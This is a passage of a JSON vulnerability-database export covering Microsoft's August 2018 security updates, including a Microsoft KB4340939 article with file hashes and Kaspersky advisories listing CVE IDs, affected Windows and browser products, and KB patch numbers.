comprehensively remove VBScript from all security-relevant contexts.\n", "modified": "2018-12-19T00:00:00", "published": "2018-12-19T00:00:00", "id": "GOOGLEPROJECTZERO:7105AC02468FA173C8BDB7936612EE77", "href": "https://googleprojectzero.blogspot.com/2018/12/on-vbscript.html", "type": "googleprojectzero", "title": "\nOn VBScript\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:40:43", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-8345", "CVE-2018-8346"], "description": "<html><body><p>Resolves a vulnerability in Windows Server 2008.</p><h2>Summary</h2><div class=\"kb-summary-section section\">A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed.<br/><br/>To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). <br/><ul class=\"sbody-free_list\"><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8346\" id=\"kb-link-2\" target=\"_self\"> CVE-2018-8346</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8345\" id=\"kb-link-2\" target=\"_self\"> CVE-2018-8345</a></li></ul> </div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"> <h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>. </div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4340939\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. <br/></div></div><strong class=\"sbody-strong\">Important </strong><ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul><h2>Deployment information</h2>For deployment details for this security update, go to the following article in the Microsoft Knowledge Base:<br/> <div class=\"indent\"> <a href=\"https://support.microsoft.com/en-us/help/20180814\" id=\"kb-link-9\">Security update deployment information: August 14, 2018</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></td></tr></tbody></table><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Windows6.0-KB4340939-x86.msu</td><td>B88325BF4AC01BAD639E163D5E1484DC9F2E13F1</td><td>DF0756DAF3215FFA9B7BFF43EE602AAD71E006056614AEAEAC9F2092A6C8EF72</td></tr><tr><td>Windows6.0-KB4340939-ia64.msu</td><td>64FC082BC23A1B6942152A2AFD5F0B4DAC07AE68</td><td>33EB4203D67988669EED689F530AD4771D7F36265DAC7EE61ACA2B36C73D4DBA</td></tr><tr><td>Windows6.0-KB4340939-x64.msu</td><td>27B6A52C60ED2845B4F7A8F1C774047407851FAD</td><td>6C915207E37BF3B86EF82533FFEAD3B2CDACB59CD1199813B5D8BDD2FEDA4916</td></tr></tbody></table></td></tr></tbody></table><p><strong>File information</strong><br/><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows Server 2008 file information</strong></p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"alert-title\">Notes</div><div class=\"row\"><div class=\"col-xs-24\"><p>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.</p></div></div></div></div><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x86-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Msshsq.dll</td><td>7.0.6002.24434</td><td>231,936</td><td>20-Jun-2018</td><td>14:54</td><td>x86</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported ia64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Msshsq.dll</td><td>7.0.6002.24434</td><td>661,504</td><td>20-Jun-2018</td><td>14:57</td><td>IA-64</td></tr><tr><td>Msshsq.dll</td><td>7.0.6002.24434</td><td>231,936</td><td>20-Jun-2018</td><td>14:54</td><td>x86</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Msshsq.dll</td><td>7.0.6002.24434</td><td>318,464</td><td>20-Jun-2018</td><td>14:39</td><td>x64</td></tr><tr><td>Msshsq.dll</td><td>7.0.6002.24434</td><td>231,936</td><td>20-Jun-2018</td><td>14:54</td><td>x86</td></tr></tbody></table></td></tr></tbody></table></body></html>", "edition": 2, "modified": "2018-08-14T17:12:48", "id": "KB4340939", "href": "https://support.microsoft.com/en-us/help/4340939/", "published": "2018-08-14T00:00:00", "title": "Description of the security update for the remote code execution vulnerability in Windows Server 2008: August 14, 2018", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:58:50", "bulletinFamily": "info", "cvelist": ["CVE-2018-8342", "CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8394", "CVE-2018-8397", "CVE-2018-8396", "CVE-2018-8373", "CVE-2018-8404", "CVE-2018-8348", "CVE-2018-8346", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "### *Detect date*:\n08/14/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Eextended Support Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, obtain sensitive information.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server, version 1803 (Server Core Installation) \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server, version 1709 (Server Core Installation) \nInternet Explorer 9 \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nChakraCore \nWindows RT 8.1 \nMicrosoft Edge (EdgeHTML-based) \nInternet Explorer 10 \nWindows Server 2016 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nInternet Explorer 11 \nWindows Server 2012 R2 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8344](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8344>) \n[CVE-2018-8397](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8397>) \n[CVE-2018-8385](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8385>) \n[CVE-2018-8346](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8346>) \n[CVE-2018-8404](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8404>) \n[CVE-2018-8398](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8398>) \n[CVE-2018-8349](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8349>) \n[CVE-2018-8348](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8348>) \n[CVE-2018-8394](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8394>) \n[CVE-2018-8389](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8389>) \n[CVE-2018-8396](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8396>) \n[CVE-2018-8353](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8353>) \n[CVE-2018-8343](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8343>) \n[CVE-2018-8342](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8342>) \n[CVE-2018-8341](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8341>) \n[CVE-2018-8339](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8339>) \n[CVE-2018-8373](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8373>) \n[CVE-2018-8345](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8345>) \n[CVE-2018-8371](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8371>) \n[ADV180018](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/ADV180018>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2018-8385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8385>)0.0Unknown \n[CVE-2018-8353](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8353>)0.0Unknown \n[CVE-2018-8389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8389>)0.0Unknown \n[CVE-2018-8371](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8371>)0.0Unknown \n[CVE-2018-8373](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8373>)0.0Unknown \n[CVE-2018-8345](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8345>)0.0Unknown \n[CVE-2018-8349](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8349>)0.0Unknown \n[CVE-2018-8398](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8398>)0.0Unknown \n[CVE-2018-8348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8348>)0.0Unknown \n[CVE-2018-8339](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8339>)0.0Unknown \n[CVE-2018-8343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8343>)0.0Unknown \n[CVE-2018-8394](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8394>)0.0Unknown \n[CVE-2018-8346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8346>)0.0Unknown \n[CVE-2018-8404](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8404>)0.0Unknown \n[CVE-2018-8397](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8397>)0.0Unknown \n[CVE-2018-8396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8396>)0.0Unknown \n[CVE-2018-8341](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8341>)0.0Unknown \n[CVE-2018-8342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8342>)0.0Unknown \n[CVE-2018-8344](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8344>)0.0Unknown\n\n### *KB list*:\n[4343899](<http://support.microsoft.com/kb/4343899>) \n[4343900](<http://support.microsoft.com/kb/4343900>) \n[4343205](<http://support.microsoft.com/kb/4343205>) \n[4344104](<http://support.microsoft.com/kb/4344104>) \n[4340937](<http://support.microsoft.com/kb/4340937>) \n[4341832](<http://support.microsoft.com/kb/4341832>) \n[4343674](<http://support.microsoft.com/kb/4343674>) \n[4340939](<http://support.microsoft.com/kb/4340939>) \n[4338380](<http://support.microsoft.com/kb/4338380>) \n[4457984](<http://support.microsoft.com/kb/4457984>) \n[4458010](<http://support.microsoft.com/kb/4458010>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2018-08-14T00:00:00", "id": "KLA11789", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11789", "title": "\r KLA11789Multiple vulnerabilities in Microsoft Products (ESU) ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:04:24", "bulletinFamily": "info", "cvelist": ["CVE-2018-8401", "CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8343", "CVE-2018-8406", "CVE-2018-8345", "CVE-2018-8405", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8400", "CVE-2018-8350", "CVE-2018-8394", "CVE-2018-8404", "CVE-2018-8399", "CVE-2018-8348", "CVE-2018-8341", "CVE-2018-8204", "CVE-2018-8414", "CVE-2018-8347", "CVE-2018-8253", "CVE-2018-8340", "CVE-2018-8398", "CVE-2018-8349"], "description": "### *Detect date*:\n08/14/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, bypass security restrictions, obtain sensitive information.\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nMicrosoft Visual Studio 2017 \nWindows 10 Version 1709 for x64-based Systems \nWindows Server, version 1803 (Server Core Installation) \nWindows Server 2016 (Server Core installation) \nWindows Server, version 1709 (Server Core Installation) \nMicrosoft Visual Studio 2015 Update 3 \nMicrosoft Visual Studio 2017 version 15.8\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8343](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8343>) \n[CVE-2018-8399](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8399>) \n[CVE-2018-8401](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8401>) \n[CVE-2018-8200](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8200>) \n[CVE-2018-0952](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-0952>) \n[CVE-2018-8400](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8400>) \n[CVE-2018-8398](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8398>) \n[CVE-2018-8404](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8404>) \n[CVE-2018-8344](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8344>) \n[CVE-2018-8348](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8348>) \n[CVE-2018-8339](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8339>) \n[CVE-2018-8394](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8394>) \n[CVE-2018-8345](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8345>) \n[CVE-2018-8253](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8253>) \n[CVE-2018-8341](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8341>) \n[CVE-2018-8349](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8349>) \n[CVE-2018-8350](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8350>) \n[CVE-2018-8340](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8340>) \n[CVE-2018-8204](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8204>) \n[CVE-2018-8414](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8414>) \n[CVE-2018-8347](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8347>) \n[CVE-2018-8405](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8405>) \n[CVE-2018-8406](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8406>) \n[ADV180018](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/ADV180018>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *CVE-IDS*:\n[CVE-2018-0952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0952>)0.0Unknown \n[CVE-2018-8405](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8405>)0.0Unknown \n[CVE-2018-8414](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8414>)0.0Unknown \n[CVE-2018-8345](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8345>)0.0Unknown \n[CVE-2018-8349](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8349>)0.0Unknown \n[CVE-2018-8401](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8401>)0.0Unknown \n[CVE-2018-8340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8340>)0.0Unknown \n[CVE-2018-8398](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8398>)0.0Unknown \n[CVE-2018-8204](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8204>)0.0Unknown \n[CVE-2018-8406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8406>)0.0Unknown \n[CVE-2018-8348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8348>)0.0Unknown \n[CVE-2018-8347](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8347>)0.0Unknown \n[CVE-2018-8339](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8339>)0.0Unknown \n[CVE-2018-8343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8343>)0.0Unknown \n[CVE-2018-8400](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8400>)0.0Unknown \n[CVE-2018-8394](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8394>)0.0Unknown \n[CVE-2018-8350](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8350>)0.0Unknown \n[CVE-2018-8404](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8404>)0.0Unknown \n[CVE-2018-8399](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8399>)0.0Unknown \n[CVE-2018-8253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8253>)0.0Unknown \n[CVE-2018-8341](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8341>)0.0Unknown \n[CVE-2018-8200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8200>)0.0Unknown \n[CVE-2018-8344](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8344>)0.0Unknown\n\n### *KB list*:\n[4343909](<http://support.microsoft.com/kb/4343909>) \n[4343885](<http://support.microsoft.com/kb/4343885>) \n[4343887](<http://support.microsoft.com/kb/4343887>) \n[4343892](<http://support.microsoft.com/kb/4343892>) \n[4343897](<http://support.microsoft.com/kb/4343897>) \n[4343898](<http://support.microsoft.com/kb/4343898>) \n[4343901](<http://support.microsoft.com/kb/4343901>) \n[4343888](<http://support.microsoft.com/kb/4343888>) \n[4343896](<http://support.microsoft.com/kb/4343896>)\n\n### *Microsoft official advisories*:\n\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 27, "modified": "2020-06-18T00:00:00", "published": "2018-08-14T00:00:00", "id": "KLA11309", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11309", "title": "\r KLA11309Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:42:01", "bulletinFamily": "info", "cvelist": ["CVE-2018-8351", "CVE-2018-8377", "CVE-2018-8358", "CVE-2018-8403", "CVE-2018-8372", "CVE-2018-8388", "CVE-2018-8387", "CVE-2018-8355", "CVE-2018-8316", "CVE-2018-8373", "CVE-2018-8357", "CVE-2018-8383", "CVE-2018-8390", "CVE-2018-8266", "CVE-2018-8380", "CVE-2018-8370", "CVE-2018-8384", "CVE-2018-8359", "CVE-2018-8385", "CVE-2018-8381", "CVE-2018-8371", "CVE-2018-8389", "CVE-2018-8353"], "description": "### *Detect date*:\n08/14/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browsers. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, spoof user interface, obtain sensitive information, bypass security restrictions.\n\n### *Affected products*:\nChakraCore \nMicrosoft Edge (EdgeHTML-based) \nInternet Explorer 10 \nInternet Explorer 9 \nInternet Explorer 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8372](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8372>) \n[CVE-2018-8385](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8385>) \n[CVE-2018-8266](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8266>) \n[CVE-2018-8380](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8380>) \n[CVE-2018-8381](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8381>) \n[CVE-2018-8355](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8355>) \n[CVE-2018-8390](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8390>) \n[CVE-2018-8387](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8387>) \n[CVE-2018-8357](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8357>) \n[CVE-2018-8353](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8353>) \n[CVE-2018-8383](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8383>) \n[CVE-2018-8377](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8377>) \n[CVE-2018-8389](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8389>) \n[CVE-2018-8316](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8316>) \n[CVE-2018-8388](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8388>) \n[CVE-2018-8371](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8371>) \n[CVE-2018-8351](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8351>) \n[CVE-2018-8373](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8373>) \n[CVE-2018-8403](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8403>) \n[CVE-2018-8370](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8370>) \n[CVE-2018-8358](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8358>) \n[CVE-2018-8384](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8384>) \n[CVE-2018-8359](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2018-8359>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2018-8384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8384>)0.0Unknown \n[CVE-2018-8372](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8372>)0.0Unknown \n[CVE-2018-8385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8385>)0.0Unknown \n[CVE-2018-8266](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8266>)0.0Unknown \n[CVE-2018-8380](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8380>)0.0Unknown \n[CVE-2018-8359](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8359>)0.0Unknown 